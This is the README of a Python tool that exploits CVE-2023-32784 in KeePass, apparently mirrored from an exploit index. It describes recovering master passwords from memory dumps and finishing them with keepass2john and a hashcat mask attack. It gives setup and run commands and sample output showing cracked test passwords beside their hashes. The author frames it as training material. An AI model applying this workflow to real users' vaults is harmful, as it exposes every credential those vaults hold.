Exploit for Cleartext Transmission of Sensitive Information in Keepass CVE-2023-32784

## https://sploitus.com/exploit?id=531DA6D8-6CE6-5EA2-9115-23DABABEBA70
# EXPLOIT_KEEPASS

A Python console program that **exploits the security vulnerability CVE-2023-32784** in the password manager **KeePass**.
This exploit reconstructs the master password in plain text based on memory dumps (.DMP).  

The program was created as part of my training at the Developer Academy and is used exclusively for teaching purposes.

## Table of Contents

1. [Technologies](#technologies)
1. [Getting Started](#getting-started)
1. [Usage](#usage)
   * [Program Options](#program-options)
   * [Program Flow](#program-flow)
   * [Example Run](#example-run) 

## Technologies

* **Python** 3.12.2
  * **argparse, subprocess, os, concurrent.futures (ThreadPoolExecutor), typing** (standard library)
  * **python-dotenv** [More Information](https://pypi.org/project/python-dotenv/)
    * It reads key-value pairs from a .env file and can set them as environment variables.
* **keepass2john** 1.9.0 [More Information](https://www.openwall.com/john/)
  * Extract hashes from encrypted Keepass database password files.
* **hashcat** 6.2.6 [More Information](https://github.com/hashcat/hashcat)
  * The world's fastest and most advanced password recovery utility.

## Getting Started

0) [Fork](https://docs.github.com/de/pull-requests/collaborating-with-pull-requests/working-with-forks/fork-a-repo) the project to your namespace, if you want to make changes or open a [Pull Request](https://docs.github.com/de/pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/about-pull-requests).

1. [Clone](https://docs.github.com/en/repositories/creating-and-managing-repositories/cloning-a-repository) the project to your platform if you just want to use it:

    ```bash
    git clone git@github.com:SarahZimmermann-Schmutzler/exploit_keepass.git
    ```

1. Install the **dependencies**:
   * Create a **Virtual Environment (Venv)** in the project folder:

      ```bash
      python -m venv env
      ```

   * **Activate** the Venv:

      ```bash
      source venv/bin/activate #Linux
      env\Scripts\activate #Windows
      ```

   * Install the **dependencies** from [requirements.txt](./requirements.txt):

      ```bash
      pip install -r requirements.txt
      ```

1. Install the programs **John the Ripper** (because **keepass2john** is part of this suite) and **hashcat** if you haven't already:
    * Linux/Ubuntu:

        ```bash
        sudo apt update && apt upgrade
        sudo apt install john hashcat
        ```

    * Windows:
        * [Download](https://github.com/openwall/john) John the Ripper
        * [Download](https://hashcat.net/hashcat/) hashcat

1. Configure an `.env file` with the path to your hashcat directory:

    ```bash
    HASHCAT_PATH=C:\Users\Path\To\hashcat-6.2.6
    ```

* If your **hashcat** version **runs globally** you have to **remove** `cwd=HASHCAT_PATH` in code line 244 before using the program.

## Usage

* For the further commands navigate to the directory you cloned **Exploit_KeePass** into.

### Program Options

* To see all available **program options** have a look in the `help-section`:

    ```bash
    python exploit_keepass.py -h
    # or
    python exploit_keepass.py --help
    ```

    | Option (Long) | Short | Description | Required? |
    | ------------- | ----- | ----------- | --------- |
    | --help | -h | Get a list of the **available options** | no |
    | --directory | -dir | Directory containing **.kdbx and .DMP file pairs** | yes |

### Program Flow

* Extracts .kdbx and .DMP files from the specified directory.
* Maps .DMP files to corresponding .kdbx files.
* Extracts partial master passwords (missing first two characters) from .DMP files using a customized version of **keepass-dump-masterkey**:
  * [Customized version](./my_poc.py): The first two characters of the master password are cut off.
  * [Original](https://github.com/matro7sh/keepass-dump-masterkey): The first character of the master password is missing and the second is a guess.
* Extracts hashes from .kdbx files using the **keepass2john** tool.
* Links partial master passwords with .kdbx files based on their mapping.
* Performs a Mask Attack using a mask with all possible character combinations for the first two elements to reconstruct the full master passwords using **hashcat**.
* Saves the results (cracked passwords) in the cracked_passwords.potfile in the hashcat drectory.

### Example Run

* To crack a KeePass master passwords using .kdbx and .DMP files use the following command in your terminal:  

    ```bash
    python exploit_keepass.py -dir [path/to/directory/with/kdbx-DMP-files]
    ```

  * The content of the directory should look like this:

    ```bash
    test1.DMP
    test1.kdbx
    test2.DMP
    test2.kdbx
    ...
    ```  

* It will yield the following **output**:

    ```bash
    All kdbx-files and DMP-files listed.
    Files successfully mapped.
    Masterpassword-Extraction successful.
    Hash extraction completed.
    Dictionary that connects Hashes with their incomplete passwords is built.
    [+] Start hashcat for dumps\test1.kdbx with mask: ?a?a25U7L559Sa!U
    $keepass$*2*60000*0*87137babe126e080ec0f8fbe1b7a07dff10d480273fe622266338836071707e7*cb0077647e229d549feb79ce3cdafcc3e68b53dc84f18edf0c840710fa255660*78b067b8e7edde33f7927c82b9781098*d4b3a2dd156946173d81b61f89c602857f8d594e022f1ed8850abf0cd275eaff*1470f4d5ada79f3400fe72fa011d07e88c98a7920d88ff6f18af35e344603bf3:sD25U7L559Sa!U
    [+] Start hashcat for dumps\test2.kdbx with mask: ?a?aCu897QLIKGE6E.
    $keepass$*2*60000*0*5c33f9f1caf38baa9a20106083a0acc3cfe7e6b6d5c98b9c52e63d9507cfca75*8d8a4e6ac3d08ef2ec15ee542fe5df8d6fb703f5e4c58256650c79332d25c8e7*6ce2ba1dd28bcf3e86996fcec8e172c2*0ab826ff50b019f13579199e40b4340f06792b8b094092a07f5456102d493168*98038fe620dd4b781a48560d61d53f51e462dbd8b8e8e9405970e019cccda7cd:HJCu897QLIKGE6E.
    Cracking completed. Results saved in cracked_passwords.potfile.
    ```